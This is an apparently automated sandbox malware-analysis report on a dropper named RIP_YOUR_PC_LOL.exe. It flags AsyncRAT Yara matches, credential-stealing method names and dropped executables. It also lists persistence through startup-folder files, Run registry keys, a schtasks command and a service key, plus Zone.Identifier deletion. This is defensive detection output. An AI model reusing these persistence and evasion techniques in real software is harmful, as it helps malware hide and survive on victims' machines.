                    Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: RIP_YOUR_PC_LOL.exe, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: healastounding.exe.0.dr, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Pluto Panel.exe.0.dr, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Pluto Panel.exe.0.dr, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Pluto Panel.exe.0.dr, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Pluto Panel.exe.0.dr, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: test.exe.4.dr, Client/Handle_Packet/Packet.cs.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: gay.exe.4.dr, OK.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Opus.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Opus.exe.4.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.healastounding.exe.900000.4.unpack, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.2.healastounding.exe.900000.0.unpack, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.healastounding.exe.900000.0.unpack, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.healastounding.exe.900000.12.unpack, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.healastounding.exe.900000.8.unpack, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F80712 push eax; ret 5_2_00F80726
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F80712 push eax; ret 5_2_00F8074E
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F5BA9D push eax; ret 5_2_00F5BAB1
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_00F5BA9D push eax; ret 5_2_00F5BAD9
                    Source: C:\Users\user\AppData\Roaming\test.exeCode function: 6_2_00DA2F81 push eax; ret 6_2_00DA2F95
                    Source: C:\Users\user\AppData\Roaming\test.exeCode function: 6_2_00DA7201 push es; iretd 6_2_00DA7202
                    Source: C:\Users\user\AppData\Roaming\test.exeCode function: 6_2_00DA4122 push eax; ret 6_2_00DA412C
                    Source: C:\Users\user\AppData\Roaming\test.exeCode function: 6_2_00DA2A66 push 0000003Eh; retn 0000h6_2_00DA2DC0
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeCode function: 7_2_00416480 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,7_2_00416480
                    Source: a.exe.4.drStatic PE information: 0x85C84FCD [Thu Feb 14 23:29:17 2041 UTC]
                    Source: 4.exe.4.drStatic PE information: section name: .didat
                    Source: a.exe.4.drStatic PE information: section name:
                    Source: a.exe.4.drStatic PE information: section name:
                    Source: a.exe.4.drStatic PE information: section name:
                    Source: a.exe.4.drStatic PE information: section name:
                    Source: a.exe.4.drStatic PE information: section name: .uxD5Xzb
                    Source: a.exe.4.drStatic PE information: section name: .adata
                    Source: Opus.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x361f1
                    Source: healastounding.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x38fcef
                    Source: test.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x12c3f
                    Source: aaa.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x2b8ea
                    Source: 4.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x8ea8d
                    Source: a.exe.4.drStatic PE information: real checksum: 0x36412d should be: 0x179cea
                    Source: Pluto Panel.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xe3f4e
                    Source: gay.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x17231
                    Source: 0fd7de5367376231a788872005d7ed4f.exe.0.drStatic PE information: real checksum: 0x8cb64 should be: 0x8bd88
                    Source: 22.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2047ff
                    Source: C:\Users\user\AppData\Roaming\4.exeFile created: C:\Users\user\AppData\Roaming\__tmp_rar_sfx_access_check_21517828
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.23229435769
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.79704182216
                    Source: initial sampleStatic PE information: section name: entropy: 7.99417258092
                    Source: initial sampleStatic PE information: section name: entropy: 7.59206430894
                    Source: initial sampleStatic PE information: section name: .uxD5Xzb entropy: 7.91678806903
                    Source: Opus.exe.4.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
                    Source: Opus.exe.4.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeFile created: C:\Users\user\AppData\Roaming\Pluto Panel.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeFile created: C:\Users\user\AppData\Roaming\Opus.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeFile created: C:\Users\user\AppData\Roaming\aaa.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeFile created: C:\Users\user\AppData\Roaming\a.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeFile created: C:\Users\user\AppData\Roaming\test.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\gay.exeFile created: C:\Users\user\AppData\Roaming\mediaget.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeFile created: C:\Users\user\AppData\Roaming\gay.exeJump to dropped file
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeFile created: C:\Users\user\AppData\Roaming\healastounding.exeJump to dropped file
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeFile created: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeJump to dropped file
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeFile created: C:\Users\user\AppData\Roaming\___11.19.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeFile created: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeFile created: C:\Users\user\AppData\Roaming\4.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\22.exeFile created: C:\Windows\Cursors\WUDFhosts.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\22.exeFile created: C:\Windows\Help\Winlogon.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeFile created: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeFile created: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exeJump to dropped file
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeFile created: C:\Users\user\AppData\Roaming\22.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\Opus.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\22.exeFile created: C:\Windows\Help\active_desktop_render.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\4.exeFile created: C:\Users\user\AppData\Roaming\3.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\22.exeFile created: C:\Windows\Cursors\WUDFhosts.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\22.exeFile created: C:\Windows\Help\Winlogon.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\22.exeFile created: C:\Windows\Help\active_desktop_render.dllJump to dropped file

                    Boot Survival

                    barindex
                    Yara detected AsyncRAT
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.59c8085.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3479694.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.701012196.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: test.exe PID: 6236, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\test.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Drops PE files to the startup folder
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exeJump to dropped file
                    Creates autostart registry keys with suspicious names
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a797c6ca3f5e7aff8fa1149c47fe9466
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe
                    Source: C:\Users\user\AppData\Roaming\22.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\KuGouMusic
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe
                    Source: C:\Users\user\AppData\Roaming\22.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\KuGouMusic
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a797c6ca3f5e7aff8fa1149c47fe9466
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a797c6ca3f5e7aff8fa1149c47fe9466

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\AppData\Roaming\Opus.exeFile opened: C:\Users\user\AppData\Roaming\Opus.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aaa.exeFile opened: C:\Users\user\AppData\Roaming\aaa.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
